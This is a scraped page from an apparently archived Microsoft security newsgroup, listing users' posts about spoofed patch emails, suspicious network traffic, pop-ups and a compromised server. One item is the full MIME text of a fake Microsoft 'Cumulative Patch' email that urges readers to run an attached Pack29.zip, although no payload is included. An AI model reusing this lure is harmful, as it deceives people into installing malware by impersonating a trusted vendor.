How to deny users plug USB Storage devices?

TheMSsForum.com: The Microsoft Software Forum

The MSS Forum ‹ Security
- Archive
  - Biz
  - MCSE
  - CRM
  - Drivers
  - Framework
  - ADO
  - ASP
  - Compact
  - Forms
  - Dotnet
  - C#
  - VB
  - FontpageGen
  - Excel
  - WorkSheet
  - Exchange
  - Setup
  - Fox
  - Fontpage
  - ASP
  - IIS
  - Entourage
  - Money
  - Messanger
  - PocketPC
  - Powerpoint
  - Project
  - Publisher
  - Excel
  - VB
  - Security
  - Portal
  - Services
  - SQLServerDev
  - SVCS
  - SQLServer
  - VB
  - VC
  - MFC
  - ExcelGen

- Previous
 - 1
 - msn breaches is there anyway of stopping people from hacking into my msn without having to continuosly chnage my password Tag: How to deny users plug USB Storage devices? Tag: 40727
 - 2
 - See this important pack --idfaqnjmfgwsht Content-Type: multipart/related; boundary="tmlxndkijoqnpcosu"; type="multipart/alternative" --tmlxndkijoqnpcosu Content-Type: multipart/alternative; boundary="fwbmfxlsd" --fwbmfxlsd Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft Client this is the latest version of security update, the "November 2003, Cumulative Patch" update which fixes all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three new vulnerabilities. Install now to protect your computer. This update includes the functionality = of all previously released patches. Microsoft Product Support Services and Knowledge Base articles = can be found on the Microsoft Technical Support web site. http://support.microsoft.com/ For security-related information about Microsoft products, please = visit the Microsoft Security Advisor web site http://www.microsoft.com/security/ Thank you for using Microsoft products. Please do not reply to this message. It was sent from an unmonitored e-mail address and we are unable = to respond to any replies. ---------------------------------------------- The names of the actual companies and products mentioned = herein are the trademarks of their respective owners. Copyright 2003 Microsoft Corporation. --fwbmfxlsd Content-Type: text/html Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> <style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none} </style> </HEAD> <BODY BGCOLOR=3D"White" TEXT=3D"Black"> <BASEFONT SIZE=3D"2" face=3D"verdana,arial"> <TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB"> <TR height=3D"20"> <TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">  <A class=3D'navtext' HREF=3D"http://www.microsoft.com/" TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A> </TD> <TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP>   <A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' = target=3D"_top">All Products</A> |  <A class=3D'navtext' href=3D'http://support.microsoft.com/' = target=3D"_top">Support</A> |  <A class=3D'navtext' href=3D'http://search.microsoft.com/' = target=3D"_top">Search</A> |  <A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top> Microsoft.com Guide</A>  </TD> </TR> <TR> <TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP> <A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top"> Microsoft Home</A>   </TD> </TR> </TABLE>  <IMG SRC=3D"cid:vnjvzdi" BORDER=3D"0"> <TABLE WIDTH=3D"600"><TR><TD> Microsoft Client this is the latest version of security update, the "November 2003, Cumulative Patch" update which fixes all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three new vulnerabilities. Install now to protect your computer. This update includes the functionality = of all previously released patches. </TD></TR> </TABLE> <TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600"> <TR VALIGN=3D"TOP"> <TD NOWRAP><IMG SRC=3D"cid:zgewmdp" = ALIGN=3D"absmiddle" BORDER=3D"0"> System requirements </TD> <TD NOWRAP>Windows 95/98/Me/2000/NT/XP</TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><IMG SRC=3D"cid:zgewmdp" = ALIGN=3D"absmiddle" BORDER=3D"0"> This update applies to </TD><TD NOWRAP> MS Internet Explorer, version 4.01 and later MS Outlook, version 8.00 and later MS Outlook Express, version 4.01 and later </TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><IMG SRC=3D"cid:zgewmdp" = ALIGN=3D"absmiddle" BORDER=3D"0"> Recommendation</TD> <TD NOWRAP>Customers should install the patch = at the earliest opportunity.</TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><IMG SRC=3D"cid:zgewmdp" = ALIGN=3D"absmiddle" BORDER=3D"0"> How to install</TD> <TD NOWRAP>Run attached file. = Choose Yes on displayed dialog box.</TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><IMG SRC=3D"cid:zgewmdp" = ALIGN=3D"absmiddle" BORDER=3D"0"> How to use</TD> <TD NOWRAP>You don't need to do = anything after installing this item.</TD> </TR> </TABLE> <TABLE WIDTH=3D"600"><TR><TD> Microsoft Product Support Services and Knowledge Base articles can be found on the <A HREF=3D"http://support.microsoft.com/" = TARGET=3D"_top">Microsoft Technical Support</A> web site. = For security-related information about Microsoft products, please = visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top"> Microsoft Security Advisor</A> web site, = or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" = TARGET=3D"_top">Contact Us.</A> Thank you for using Microsoft products. Please do not reply to this message. = It was sent from an unmonitored e-mail address and we are unable = to respond to any replies. <HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%"> The names of the actual companies and = products mentioned herein are the trademarks = of their respective owners. </TD></TR></TABLE> <TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB"> <TR VALIGN=3D"TOP"> <TD WIDTH=3D"5"></TD> <TD> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/= contactus/contactus.asp" TARGET=3D"_top">Contact Us</A>  |  <A class=3D'navtext' HREF=3D"http://www.microsoft.com/legal/" = TARGET=3D"_top">Legal</A>  |  <A class=3D'navtext' HREF=3D"https://www.truste.org/validate/605" = TARGET=3D"_top" TITLE=3D"TRUSTe - Click to Verify">TRUSTe</A> </TD> </TR> <TR VALIGN=3D"MIDDLE"> <TD WIDTH=3D"5"></TD> <TD> ©2003 Microsoft Corporation. All rights reserved. <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/cpyright.htm" TARGET=3D"_top">Terms of Use</A>  |  <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/privacy.htm" TARGET=3D"_top"> Privacy Statement</A> |  <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= enable/" TARGET=3D"_top">Accessibility</A> </TD> </TR> </TABLE> </BODY> </HTML> --fwbmfxlsd-- --tmlxndkijoqnpcosu Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <vnjvzdi> R0lGODlhaAA7APcAAP///+rp6puSp6GZrDUjUUc6Zn53mFJMdbGvvVtXh2xre8bF1x8cU4yLprOy zIGArlZWu25ux319xWpqnnNzppaWy46OvKKizZqavLa2176+283N5sfH34uLmpKSoNvb7c7O3L29 yqOjrtTU4crK1Nvb5erq9O/v+O7u99PT2sbGzePj6vLy99jY3Pv7/vb2+fn5++/v8Kqr0oWHuNbX 55SVoszN28vM2pGUr7S1vqqtv52frOPl8CQvaquz2Ojp7pmn3Ozu83OPzmmT6F1/xo6Voh9p2C5z 3EWC31mS40Zxr4uw6LXN8iZkuXmn55q97PH2/Yir1rbL5iVTh3Oj2cvX5Pv9/+/w8QF8606h62Wk 3n+dubnY9abB2c7n/83h9Nji6weK+CGJ4Vim6WyKpKWssgFyyAaV/0Km8Gyx6HW57FJxicDP2+Tt 9Pj8/wOa/wmL5wqd/w6V8heb91e5+mS9+VmLr4vD6qvc/b/j/Mbn/sTi9rvX6szq/tPt/9ju/dzx /+n2/+74//P6/+3w8hOh/xOW6yCm/iuu/zWv/0m4/XTH/IXK95TP9qPV9bfi/tDn9tfp9OP0/93r 9L3Izy6Vzj22/lrC/mfG/JvJ5JGntAyd6IbX/3zD6GzP/3jV/2uoxHqbqujv8g6MvJTj/2HF5pXV 606zz6Hp/63v/7j1/8Ps88b8/rbj5RKOkE2wr3OGhoKGhv7///Dx8V2alqvm4Zni1YPRvx5uVwyO X0q2hLTvw8X10gx2H4PXkkuoV5zkoQeADZu7mmzIVEO7HIXbaGfLMPz8+97d2/Px7v///+bl5eHg 4P7+/v39/fT09PLy8u7u7gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAaAA7AAAI/gCVCRxI sKDBgwgTKlzIsKHDhxAjKgwiqs2kSJEgQfqyp2PHLxoxTmojSpTEkyglBrGYcU+el3n09PEDSFKg mzclAfLTRw/MPV4gjTSZsmhRURchuXwUs88fSYIGubEiqyqAq1gBNLPiRlCgPz197tE4MojRswuD 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 --tmlxndkijoqnpcosu Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <zgewmdp> R0lGODlhDAAMANUAAP////f3//f39+/v9+/v797m987W787W5sXW5rXF76295qW975y175St75St 3pSlzoyl1oSl5oylzoycxXOU3nOMxWOM5mOM3mOE1lqE3mOEvVKE1lp7xVJ71lJ7zlJ7xVJ7vUp7 zkpzzkpzxVJzrUprvUJrxUJrvUJjtTpjtTpjrTparTpapQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAADAAMAAAIjAABAAhwwMGFCxAQ CACwkICDDBYSLGjQwQEBhg8zDBAIYIEIBwIQdLjAoOOFgSFMIICwIUMEAxQwCBxhAgKHDh5C6DQA IIGJEyA4fPAwYoQCAAVKoEgBQsKJEidQ8CyRYumDA1VTqNBQQYXXFQofsPB6AIAKFiweNBTLoiza BxcFCjgwgQSJCQcWCggIADs= --tmlxndkijoqnpcosu-- --idfaqnjmfgwsht Content-Type: application/x-compressed; name="Pack29.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment --idfaqnjmfgwsht-- Tag: How to deny users plug USB Storage devices? Tag: 40726
 - 3
 - ** READ THIS BEFORE POSTING - answers to frequently asked questions 2003.11.26 Before you post a question to a Microsoft.public.*.security newsgroup, note that your question may already be answered below: Answers to Top Frequently Asked Questions: http://securityadmin.info My question is not mentioned below. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette I just heard about a new Microsoft security patch update. Where can I get the patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I just installed a Microsoft security patch update, and now my computer is having problems. http://securityadmin.info/faq.htm#patchbroke I received an email from Microsoft / Microsoft Support / Microsoft Internet Security Center claiming to be a security patch [or comprehensive Internet Explorer update]. Is this a virus? http://securityadmin.info/faq.htm#microsoftemail ALSO NOTE: www.grisoft.com is free antivirus, USE IT. I received a virus email from a Microsoft email address. Who do I report this to? http://securityadmin.info/faq.htm#microsoftemail I have the RPC Blaster worm "virus," what do I do? http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. My computer is giving RPC Remote Procedure Call messages. There is a TFTP message or file on my computer. My computer keeps locking up, and/or rebooting, or telling me that it will reboot in 1 minute. http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. Where can I download the Blaster worm / RPC DCOM patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I'm having a problem caused by the JDBGMGR.EXE Teddy Bear "virus" hoax, or I want to replace this file. http://securityadmin.info/faq.htm#jdbgmgr I forgot my Windows logon password and can't log in. How do I reset it? http://securityadmin.info/faq.htm#password I have a problem or a question with a virus or with antivirus. http://securityadmin.info/faq.htm#virus NOTE: www.grisoft.com is free antivirus, USE IT. Why is Outlook Express blocking my attachments as "unsafe"? http://securityadmin.info/faq.htm#attachments How do I stop getting pop-up messages? Or adware? Or spyware? http://securityadmin.info/faq.htm#pop-ups How do I block people from viewing adult or objectionable content on a computer? http://securityadmin.info/faq.htm#contentfilter How do I block spam emails? http://securityadmin.info/faq.htm#spam There is a Content Advisor password blocking me from certain web sites. http://securityadmin.info/faq.htm#contentadvisor How do I delete an FTP folder that a hacker put on my computer and I cannot delete? http://securityadmin.info/faq.htm#ftpfolder Have I been hacked? What do I do if I've been hacked? http://securityadmin.info/faq.htm#hacked How do I re-secure a computer that has been hacked? http://securityadmin.info/faq.htm#re-secure How do I test or improve the security on my computer to avoid being hacked? http://securityadmin.info/faq.htm#harden How do I investigate a suspicious IP address that may be trying to hack me? http://securityadmin.info/faq.htm#trace How do I report a hacker? http://securityadmin.info/faq.htm#reporthacker How do I use a port scanner or vulnerability scanner to test my security? http://securityadmin.info/faq.htm#portscanner How do I encrypt my files and/or hard drive? http://securityadmin.info/faq.htm#encryption How do I get a firewall? IDS? http://securityadmin.info/faq.htm#firewall I want to use the IPSec filtering or IP filtering feature of Windows to block certain ports and have a problem or question. http://securityadmin.info/faq.htm#ipsec I have a problem or question with the XP ICF firewall. http://securityadmin.info/faq.htm#icf I have a problem or question with the IIS URLScan tool. http://securityadmin.info/faq.htm#urlscan How do I change the banner on my computer or server to hide what software version I'm using? http://securityadmin.info/faq.htm#banner How do I enable Windows Auditing to tell who logged into Windows or who accessed a file? http://securityadmin.info/faq.htm#auditing How do I inspect and disable programs that start up when Windows starts? http://securityadmin.info/faq.htm#startup How do I use RUNAS or let someone use RUNAS to run commands as administrator without having to type the password? http://securityadmin.info/faq.htm#runas How do I let non-administrator users run Defrag or change their IP address? http://securityadmin.info/faq.htm#runas My question is not mentioned above. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette Note that this is NOT a full list of all the questions answered in the FAQ. Chances are, your question has probably already been answered. The complete FAQ is at: http://securityadmin.info/faq.htm#contents I hope this is helpful. Feedback, suggestions and criticism regarding the FAQ are welcome and may be emailed to me. kind regards, Karl Levinson, CISSP, MCSE, MVP email: levinson_k@despammed.com Tag: How to deny users plug USB Storage devices? Tag: 40725
 - 4
 - hsrjuv.exe attachment Has any one had trouble with the above attachment that come in as a Microsoft Support file. This opens up immediately, and then proceeds to turn off my Zonealarm and other scan programs. Any advice would be appreciated . Win 95 133mhz pentium . 32 mb. Ram 2gb. hard drive Novice user Tim Tag: How to deny users plug USB Storage devices? Tag: 40723
 - 5
 - oe why does this automatically block access to zip files sent by friends even on existing files that i have had access to for the last year any ideas how to remove this unwanted help thanks Tag: How to deny users plug USB Storage devices? Tag: 40715
 - 6
 - Dazed and Confused Recently I upgraded Microsoft/xp to Service Pack 1 plus some other critical updates. After the SP1 install had finished a reboot was necessary. When disabling the network adapter (before reboot), I received a message that said I could not disable because something? was still connected. I pulled the network cable and shutdown. After rebooting and plugging the network cable back in, the connection was reestablish. However, somehow the ICF firewall had been deselected and turned off. I disabled the network adapter, reestablished the ICF firewall, enabled the network adapter and all seemed fine, but... Later I notice traffic leaving my system and going to one specific IP address within my ISP's network. Thankfully, this traffic was being dropped. Note the following dates and time: Nov 1, 22:14 - System Restore shows a checkpoint for xp SP1. Nov 1, 23:36 - First occurrence of this outbound traffic. Since, then I have installed a third-party firewall and have gathered the following info: The protocol is UDP and the source & destination ports are the same - either 137 (NETBIOS-NS Browsing request of NetBIOS over TCP/IP) or 138 (NETBIOS-DGM Browsing datagram response of NetBIOS over TCP/IP). This traffic always occurs immediately after enabling the network connection to my ISP. It also occurs periodically while connected. The associated application program is ntoskrnl.exe. Please advise! Today while looking at the Event System Log file I came across a 1 year old Warning: "The protected system file c:\windows\system32\vbscript.dll could not be verified as valid because Windows File Protection is terminating. Use the SFC utility to verify the integrity of the file at a later time.". So, I ran the SFC utility. This generated a number of System Information log entries. I have 5 files with bad or no signatures which cannot be restored. The files in c:\windows\system32\ are: ctl3d32.dll mfc42.dll oembios.bin oembios.sig oembios.dat Any help greatly appreciated. PS. NAV/2004 scans do not detected any viruses. Tag: How to deny users plug USB Storage devices? Tag: 40714
 - 7
 - Ntoskrnl.exe is sending UDP message Ntoskrnl.exe is trying to send a UDP message from my PC using port 137 (NETBIOS-NS Browsing request of NetBIOS over TCP/IP) or 138 (NETBIOS-DGM Browsing datagram response of NetBIOS over TCP/IP). This started immediately after upgrading XP to SP1. Is this because of the XP upgrade or something sinister? Is this normal or should I be concerned? Tag: How to deny users plug USB Storage devices? Tag: 40711
 - 8
 - Ntoskrnl.exe is sending UDP message Ntoskrnl.exe is trying to send a UDP message from my PC using port 137 (NETBIOS-NS Browsing request of NetBIOS over TCP/IP) or 138 (NETBIOS-DGM Browsing datagram response of NetBIOS over TCP/IP). This started immediately after upgrading XP to SP1. Is this because of the XP upgrade or something more sinister? Is this normal or should I be concerned? Tag: How to deny users plug USB Storage devices? Tag: 40710
 - 9
 - ntoskrnl.exe is sending UDP message Ntoskrnl.exe is trying to send a UDP message from my PC using port 137 (NETBIOS-NS Browsing request of NetBIOS over TCP/IP) or 138 (NETBIOS-DGM Browsing datagram response of NetBIOS over TCP/IP). This started immediately after upgrading XP to SP1. Is this because of the XP upgrade or something more sinister? Is this normal or should I be concerned? Tag: How to deny users plug USB Storage devices? Tag: 40708
 - 10
 - Pornographic pop-ups I have recently been evaded by porn pop-ups. The site "spyware" has taken control of my system. I can not do anything with out having that site request that I download their product "spy wiper"!! My system will not even save my homepage preference...it defaults to "spyware" HELP!!! Tag: How to deny users plug USB Storage devices? Tag: 40706
 - 11
 - saving passwords Even though I check the box to save a password with a username, it is not doing it. Is there something else I need to do? Tag: How to deny users plug USB Storage devices? Tag: 40701
 - 12
 - bios password An employee quit and had a password during the boot sequence (Bios). Is there away to reset or clear the password? Tag: How to deny users plug USB Storage devices? Tag: 40697
 - 13
 - Our 2000 Server was compromised and it has all the security patches. A client of mine has a Windows 2000 Server running that was just compromised. Housecall (online scan) identified HKTL_SFIND.A / BKDR_RCSERV.C & BKDR_IROFFER12.A as actively running. After brief review it appears as though hacker utilities such as serv-u ftp, sms.exe, scan1000.exe, winmgmt.exe, sqlck.exe etc. were loaded and used for their benefit. We have/had the following services running that could have been exploited: SQL std. port, Terminal services admin mode, and inetpub svcs. I checked just to see if there were new updates to windows etc. and there are not any. This concerns me because we have other servers running with the same configurations with all the patches/updates etc which leads me to believe they are also vulnerable. If anyone has any information as to who to contact, who to provide information to about new exloits, how our system may have been exploited etc please let me know. We are preserving the hard drive for inspection if necessary because we feel the system was compromised beyond repair. Several system files look like they were replaced with the hackers version and thats just from a log file, there is no way to be sure. Also, the scan1000.exe tools output was piped to a log file and they were scanning for port 1433 on random ranges of IP's (not ours) which leads me to believe that they probably came in through SQL port if they are trying to find more. This may be a new SQL exploit. I ran this SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY ('productlevel'), SERVERPROPERTY ('edition') and this is what was retuned fyi: 8.00.760 / SP3 / Std. Edition Thanks, Scott Tag: How to deny users plug USB Storage devices? Tag: 40695
 - 14
 - e mail downloads? I continually get e mails purpotedly from microsoft to download patches . I delete them all . Are they all spoof or genuine ? Tag: How to deny users plug USB Storage devices? Tag: 40692
 - 15
 - Transaction-based IP email protocol At least 97% of the email I receive is junk mail that I don't want in my inbox. Most of it has forged headers. Why isn't there a protocol that can confirm that the routing information contained in the headers is valid? The receiving end server should be able to link to the sending server for confirmation before it accepts an email. Tag: How to deny users plug USB Storage devices? Tag: 40688
 - 16
 - Closing Ports There are dozens of pages that describe using netstat to look at ip tables. And many authors suggest closing unneeded ports. But I have not yet come across a sigle document that tells me the commands to control closing a port in windows if it exists. And don't suggest buying more utilities. That is the biggest scam. If is a partial listing of what I am getting. Yes it is kazaa, but is there some way to control it's access by port??? Active Connections Active Connections Proto Local Address Foreign Address State TCP kazaa:3170 KAZAA:0 listening TCP kazaa:3185 KAZAA:0 listening TCP kazaa:1251 KAZAA:0 listening TCP kazaa:3162 KAZAA:0 listening TCP kazaa:1250 KAZAA:0 listening Thansk Howard Tag: How to deny users plug USB Storage devices? Tag: 40685
 - 17
 - turning off info sent to HP Can anyone tell me how do I turn off info on my computer that is automatically sent to HP, or Microsoft? I just found out everything I do is sent to microsoft and I feel that is WRONG. Thanks for any help. Jamie Tag: How to deny users plug USB Storage devices? Tag: 40680
 - 18
 - Permission question I am having problem to access to a stand alone 2003 server from any machine in a 2000 LAN. I need to have access to a shared folder on 2003 server. This server is not a part of a LAN, (its a WEB server). how can i set the permissions so an individual user from the LAN access to that folder, i dont want to set "everyone" permission. When I try to set permission as domain\username it wont accept that. Thanks for any help. Rob Tag: How to deny users plug USB Storage devices? Tag: 40679
 - 19
 - Exchange Error or Compromise I need to know if someone can explain to me how a user can get an error when writing an email that is "this has been changed by another user in another window. Would you like to save a copy?" Tag: How to deny users plug USB Storage devices? Tag: 40678
 - 20
 - Security Readiness Disk I ordered the Security Readiness Disk from Microsoft. It has all the current service packs and patches. It is great because when I am in the field it saves waiting for a download. I do have a question though. The disk has a screen with all the service pack and patches, on this screen it shows two XP products, XP pro and XP Pro Gold. Each of these listed products has it's own set of service packs and patches. What is the difference? What is XP Pro Gold? Michael Tag: How to deny users plug USB Storage devices? Tag: 40676
 - 21
 - Yahoo.dll update? After installing the upgrade to Zone Alarm to 4.5.530, I had a prompt on my screen to get an upgrade for *yahoo.dll. Does anyone know if this is legitimate? There was no local program identification. I am running Trillian .74 w/patch D. Any advice appreciated. Tag: How to deny users plug USB Storage devices? Tag: 40672
 - 22
 - Pop Up's Anyone know where I can look for a virus that has attached itself to my computer? I get pop up ad's (not porn) all the time even when I'm not on-line. I'll be playing a game and they will cause the game to collapse and they'll start running. It's the same one's over and over so assume there's a program somewhere that I need to delete. Any ideas? Tag: How to deny users plug USB Storage devices? Tag: 40671
 - 23
 - Windows 2000 network security design Hi all I like to join a newsgroup to help me studing Windows 2000 network security design exam 70-220 where I can find that please thank you Tag: How to deny users plug USB Storage devices? Tag: 40668
 - 24
 - Ann: Tool to detect unsolicited IP activities in W2K/XP IP ticker is a utility to investigate your PC's IP activities. Please visit http://www.soft-trek.com.au/prjIPTicker.asp Tag: How to deny users plug USB Storage devices? Tag: 40667
 - 25
